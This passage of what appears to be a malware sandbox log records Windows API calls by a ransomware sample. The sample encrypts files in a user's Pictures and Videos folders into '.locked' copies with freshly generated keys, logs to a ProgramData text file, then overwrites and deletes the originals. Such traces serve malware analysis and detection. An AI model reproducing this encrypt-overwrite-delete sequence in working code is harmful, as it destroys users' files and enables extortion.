(lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\LY6q.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\ly6q.bmp")) returned 1 [0314.377] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\LY6q.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\ly6q.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0314.386] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x1265be88 | out: lpMode=0x1265be88) returned 0 [0314.386] WriteFile (in: hFile=0x1e0, lpBuffer=0x16f5a000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1265be78, lpOverlapped=0x0 | out: lpBuffer=0x16f5a000*, lpNumberOfBytesWritten=0x1265be78*=0xfa000, lpOverlapped=0x0) returned 1 [0314.414] CloseHandle (hObject=0x1e0) returned 1 [0314.525] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0314.541] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\LY6q.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\ly6q.bmp")) returned 1 [0314.549] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0314.684] SetEvent (hEvent=0x14c) returned 1 [0314.684] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0314.685] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0314.823] SetEvent (hEvent=0x1e8) returned 1 [0314.823] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0314.829] SetEvent (hEvent=0x14c) returned 1 [0314.829] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0314.830] SetEvent (hEvent=0x1b8) returned 1 [0314.830] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0314.906] SetEvent (hEvent=0x190) returned 1 [0314.906] SetEvent (hEvent=0x1dc) returned 1 [0314.906] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0314.945] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0314.970] SetEvent (hEvent=0x214) returned 1 [0314.971] SetEvent (hEvent=0x1b8) returned 1 [0314.971] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0315.050] SetEvent (hEvent=0x184) returned 1 [0315.050] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0315.057] SetEvent (hEvent=0x214) returned 1 [0315.057] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0315.079] SetEvent (hEvent=0x214) returned 1 [0315.079] SetEvent (hEvent=0x1dc) returned 1 [0315.079] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0315.120] SetEvent (hEvent=0x1b8) returned 1 [0315.121] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0315.139] SetEvent (hEvent=0x184) returned 1 [0315.139] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0315.166] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\bOgs768mC0sZS6u\\JFXeWTcsVuNh u.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\bogs768mc0szs6u\\jfxewtcsvunh u.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0315.188] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x125d9e88 | out: lpMode=0x125d9e88) returned 0 [0315.188] WriteFile (in: hFile=0x1a4, lpBuffer=0x183fa000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125d9e78, lpOverlapped=0x0 | out: lpBuffer=0x183fa000*, lpNumberOfBytesWritten=0x125d9e78*=0xfa000, lpOverlapped=0x0) returned 1 [0315.214] CloseHandle (hObject=0x1a4) returned 1 [0315.215] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\bOgs768mC0sZS6u\\JFXeWTcsVuNh u.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\bogs768mc0szs6u\\jfxewtcsvunh u.bmp")) returned 1 [0315.320] SetEvent (hEvent=0x22c) returned 1 [0315.320] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0315.360] SetEvent (hEvent=0x220) returned 1 [0315.360] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0315.940] SetEvent (hEvent=0x214) returned 1 [0315.940] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1263e0c0*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x1265da24, lpReserved=0x0 | out: lpBuffer=0x1263e0c0*, lpNumberOfCharsWritten=0x1265da24*=0xc) returned 1 [0315.950] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0316.123] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\zOpDqT28-XSK3u\\8GIqGvL1RnpDF.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\zopdqt28-xsk3u\\8giqgvl1rnpdf.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0316.123] GetConsoleMode (in: hConsoleHandle=0x200, lpMode=0x1265dd9c | out: lpMode=0x1265dd9c) returned 0 [0316.124] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\zOpDqT28-XSK3u\\8GIqGvL1RnpDF.png.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\zopdqt28-xsk3u\\8giqgvl1rnpdf.png.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0316.383] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0316.555] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x1265dd9c | out: lpMode=0x1265dd9c) returned 0 [0316.555] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0316.563] SetEvent (hEvent=0x220) returned 1 [0316.563] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0316.566] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0316.635] SetEvent (hEvent=0x1e8) returned 1 [0316.636] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0316.647] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0316.792] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1263e000*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x12659a24, lpReserved=0x0 | out: lpBuffer=0x1263e000*, lpNumberOfCharsWritten=0x12659a24*=0xc) returned 1 [0316.807] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\1rfU.mkv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\1rfu.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0316.808] GetConsoleMode (in: hConsoleHandle=0x19c, lpMode=0x12659d9c | out: lpMode=0x12659d9c) returned 0 [0316.808] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\1rfU.mkv.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\1rfu.mkv.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0316.951] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x12659d9c | out: lpMode=0x12659d9c) returned 0 [0316.954] SetEvent (hEvent=0x20c) returned 1 [0316.954] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0317.325] SetEvent (hEvent=0x134) returned 1 [0317.325] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0317.336] SetEvent (hEvent=0x220) returned 1 [0317.336] SetEvent (hEvent=0x1e8) returned 1 [0317.336] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0x1) returned 0x102 [0317.387] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0317.387] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0x1) returned 0x102 [0317.391] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0317.391] SetEvent (hEvent=0x20c) returned 1 [0317.391] SetEvent (hEvent=0x1e8) returned 1 [0317.391] SetEvent (hEvent=0x220) returned 1 [0317.391] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0317.395] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3254fb34, ulCount=0x10, ulNumEntriesRemoved=0x3254fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3254fb34, ulNumEntriesRemoved=0x3254fb14) returned 0 [0317.395] SetEvent (hEvent=0x220) returned 1 [0317.395] SetEvent (hEvent=0x1e8) returned 1 [0317.395] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\J3dNrQOdkj_GDvbJ.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\j3dnrqodkj_gdvbj.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0317.395] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x125e1d9c | out: lpMode=0x125e1d9c) returned 0 [0317.395] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\J3dNrQOdkj_GDvbJ.flv.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\j3dnrqodkj_gdvbj.flv.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0317.549] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0317.575] SetEvent (hEvent=0x214) returned 1 [0317.576] GetConsoleMode (in: hConsoleHandle=0x1c0, lpMode=0x125e1d9c | out: lpMode=0x125e1d9c) returned 0 [0317.576] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0317.616] SetEvent (hEvent=0x1f0) returned 1 [0317.616] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0317.717] SetEvent (hEvent=0x214) returned 1 [0317.718] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0317.724] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0317.725] SetEvent (hEvent=0x1ac) returned 1 [0317.725] SetEvent (hEvent=0x214) returned 1 [0317.725] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0317.777] SetEvent (hEvent=0x1ac) returned 1 [0317.777] WriteFile (in: hFile=0x1f4, lpBuffer=0x14e0c000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x12631e78, lpOverlapped=0x0 | out: lpBuffer=0x14e0c000*, lpNumberOfBytesWritten=0x12631e78*=0xfa000, lpOverlapped=0x0) returned 1 [0317.801] CloseHandle (hObject=0x1f4) returned 1 [0317.805] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0317.878] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\K9Xv6MgrumKej.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\k9xv6mgrumkej.avi")) returned 1 [0317.888] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c200*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x12657a24, lpReserved=0x0 | out: lpBuffer=0x1234c200*, lpNumberOfCharsWritten=0x12657a24*=0xc) returned 1 [0317.891] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\QEKwGgKsUelEh0NETYm.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\qekwggksueleh0netym.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0317.891] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x12657d9c | out: lpMode=0x12657d9c) returned 0 [0317.891] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\QEKwGgKsUelEh0NETYm.avi.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\qekwggksueleh0netym.avi.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0318.059] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0318.301] GetConsoleMode (in: hConsoleHandle=0x200, lpMode=0x12657d9c | out: lpMode=0x12657d9c) returned 0 [0318.301] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1234c2a0 | out: pbBuffer=0x1234c2a0) returned 1 [0318.301] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12766080 | out: pbBuffer=0x12766080) returned 1 [0318.301] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12340681 | out: pbBuffer=0x12340681) returned 1 [0318.301] WriteFile (in: hFile=0x200, lpBuffer=0x126d7000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12657d78, lpOverlapped=0x0 | out: lpBuffer=0x126d7000*, lpNumberOfBytesWritten=0x12657d78*=0x80, lpOverlapped=0x0) returned 1 [0318.468] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0x1) returned 0x0 [0318.497] SetEvent (hEvent=0x1b8) returned 1 [0318.497] SetEvent (hEvent=0x1dc) returned 1 [0318.497] SetEvent (hEvent=0x180) returned 1 [0318.497] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0318.498] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3254fb34, ulCount=0x10, ulNumEntriesRemoved=0x3254fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3254fb34, ulNumEntriesRemoved=0x3254fb14) returned 0 [0318.498] SetEvent (hEvent=0x150) returned 1 [0318.498] SetEvent (hEvent=0x180) returned 1 [0318.500] ReadFile (in: hFile=0x218, lpBuffer=0x139a6000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1262dd68, lpOverlapped=0x0 | out: lpBuffer=0x139a6000*, lpNumberOfBytesRead=0x1262dd68*=0x5363, lpOverlapped=0x0) returned 1 [0318.501] WriteFile (in: hFile=0x200, lpBuffer=0x139a6000*, nNumberOfBytesToWrite=0x5363, lpNumberOfBytesWritten=0x1262dd74, lpOverlapped=0x0 | out: lpBuffer=0x139a6000*, lpNumberOfBytesWritten=0x1262dd74*=0x5363, lpOverlapped=0x0) returned 1 [0318.508] ReadFile (in: hFile=0x218, lpBuffer=0x139a6000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1262dd68, lpOverlapped=0x0 | out: lpBuffer=0x139a6000*, lpNumberOfBytesRead=0x1262dd68*=0x0, lpOverlapped=0x0) returned 1 [0318.508] CloseHandle (hObject=0x200) returned 1 [0318.542] CloseHandle (hObject=0x218) returned 1 [0318.542] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0318.543] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x1262de94 | out: lpMode=0x1262de94) returned 0 [0318.543] WriteFile (in: hFile=0x218, lpBuffer=0x12352190*, nNumberOfBytesToWrite=0x47, lpNumberOfBytesWritten=0x1262de64, lpOverlapped=0x0 | out: lpBuffer=0x12352190*, lpNumberOfBytesWritten=0x1262de64*=0x47, lpOverlapped=0x0) returned 1 [0318.543] CloseHandle (hObject=0x218) returned 1 [0318.566] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0318.593] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0318.600] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0318.621] SetEvent (hEvent=0x1f0) returned 1 [0318.621] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\O-H60h1HeRHC e51ETm0.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\o-h60h1herhc e51etm0.flv")) returned 1 [0318.678] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0318.738] SetEvent (hEvent=0x190) returned 1 [0318.738] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0318.742] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0318.750] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x125fc000 | out: pbBuffer=0x125fc000) returned 1 [0318.750] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12766010 | out: pbBuffer=0x12766010) returned 1 [0318.750] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1237c181 | out: pbBuffer=0x1237c181) returned 1 [0318.750] WriteFile (in: hFile=0x19c, lpBuffer=0x126d7000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x125e1d78, lpOverlapped=0x0 | out: lpBuffer=0x126d7000*, lpNumberOfBytesWritten=0x125e1d78*=0x80, lpOverlapped=0x0) returned 1 [0318.754] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0x1) returned 0x0 [0318.758] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3254fb30, ulCount=0x10, ulNumEntriesRemoved=0x3254fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3254fb30, ulNumEntriesRemoved=0x3254fb10) returned 0 [0318.758] SetEvent (hEvent=0x150) returned 1 [0318.758] SetEvent (hEvent=0x20c) returned 1 [0318.758] SetEvent (hEvent=0x21c) returned 1 [0318.758] SetEvent (hEvent=0x22c) returned 1 [0318.758] ReadFile (in: hFile=0x1f8, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e1d68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x125e1d68*=0x17a7b, lpOverlapped=0x0) returned 1 [0318.763] WriteFile (in: hFile=0x19c, lpBuffer=0x12770000*, nNumberOfBytesToWrite=0x17a7b, lpNumberOfBytesWritten=0x125e1d74, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesWritten=0x125e1d74*=0x17a7b, lpOverlapped=0x0) returned 1 [0318.873] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0319.249] ReadFile (in: hFile=0x1f8, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e1d68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x125e1d68*=0x0, lpOverlapped=0x0) returned 1 [0319.249] CloseHandle (hObject=0x19c) returned 1 [0319.418] CloseHandle (hObject=0x1f8) returned 1 [0319.418] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0319.418] GetConsoleMode (in: hConsoleHandle=0x1f8, lpMode=0x125e1e94 | out: lpMode=0x125e1e94) returned 0 [0319.418] WriteFile (in: hFile=0x1f8, lpBuffer=0x1264a2c0*, nNumberOfBytesToWrite=0x3e, lpNumberOfBytesWritten=0x125e1e64, lpOverlapped=0x0 | out: lpBuffer=0x1264a2c0*, lpNumberOfBytesWritten=0x125e1e64*=0x3e, lpOverlapped=0x0) returned 1 [0319.419] CloseHandle (hObject=0x1f8) returned 1 [0319.419] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\9eQ3WMUXkM.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\9eq3wmuxkm.mp4")) returned 1 [0320.050] SetEvent (hEvent=0x150) returned 1 [0320.115] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\9eQ3WMUXkM.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\9eq3wmuxkm.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0320.440] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0320.496] GetConsoleMode (in: hConsoleHandle=0x200, lpMode=0x125e1e88 | out: lpMode=0x125e1e88) returned 0 [0320.496] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0320.546] WriteFile (in: hFile=0x200, lpBuffer=0x13422000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125e1e78, lpOverlapped=0x0 | out: lpBuffer=0x13422000*, lpNumberOfBytesWritten=0x125e1e78*=0xfa000, lpOverlapped=0x0) returned 1 [0320.569] CloseHandle (hObject=0x200) returned 1 [0320.606] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0320.637] SetEvent (hEvent=0x190) returned 1 [0320.637] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0320.643] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0320.651] SetEvent (hEvent=0x190) returned 1 [0320.651] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0320.657] WriteFile (in: hFile=0x240, lpBuffer=0x17d7e000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1249ce78, lpOverlapped=0x0 | out: lpBuffer=0x17d7e000*, lpNumberOfBytesWritten=0x1249ce78*=0xfa000, lpOverlapped=0x0) returned 1 [0320.700] CloseHandle (hObject=0x240) returned 1 [0320.700] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\JhoWTUZ3 EhtG71Sl-.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\jhowtuz3 ehtg71sl-.mp4")) returned 1 [0320.711] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0320.889] SetEvent (hEvent=0x220) returned 1 [0320.889] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0320.942] SetEvent (hEvent=0x14c) returned 1 [0320.942] SetEvent (hEvent=0x22c) returned 1 [0320.942] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0321.000] SetEvent (hEvent=0x22c) returned 1 [0321.000] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c2c0*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x125e1a24, lpReserved=0x0 | out: lpBuffer=0x1234c2c0*, lpNumberOfCharsWritten=0x125e1a24*=0xc) returned 1 [0321.004] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0321.116] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\ulGMr.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\ulgmr.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0321.117] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x125e1d9c | out: lpMode=0x125e1d9c) returned 0 [0321.117] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\ulGMr.swf.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\ulgmr.swf.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0321.209] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0321.226] SetEvent (hEvent=0x214) returned 1 [0321.226] GetConsoleMode (in: hConsoleHandle=0x200, lpMode=0x125e1d9c | out: lpMode=0x125e1d9c) returned 0 [0321.226] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0321.245] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0321.246] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0321.317] SetEvent (hEvent=0x190) returned 1 [0321.317] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1234c200 | out: pbBuffer=0x1234c200) returned 1 [0321.317] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12392010 | out: pbBuffer=0x12392010) returned 1 [0321.318] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12340281 | out: pbBuffer=0x12340281) returned 1 [0321.318] WriteFile (in: hFile=0x200, lpBuffer=0x124a7000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12659d78, lpOverlapped=0x0 | out: lpBuffer=0x124a7000*, lpNumberOfBytesWritten=0x12659d78*=0x80, lpOverlapped=0x0) returned 1 [0321.319] SetEvent (hEvent=0x1ac) returned 1 [0321.319] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0321.325] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0321.368] SetEvent (hEvent=0x184) returned 1 [0321.368] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1234c2a0 | out: pbBuffer=0x1234c2a0) returned 1 [0321.368] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12392060 | out: pbBuffer=0x12392060) returned 1 [0321.368] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12340581 | out: pbBuffer=0x12340581) returned 1 [0321.369] WriteFile (in: hFile=0x1f8, lpBuffer=0x125eb000*, nNumberOfBytesToWrite=0x80, 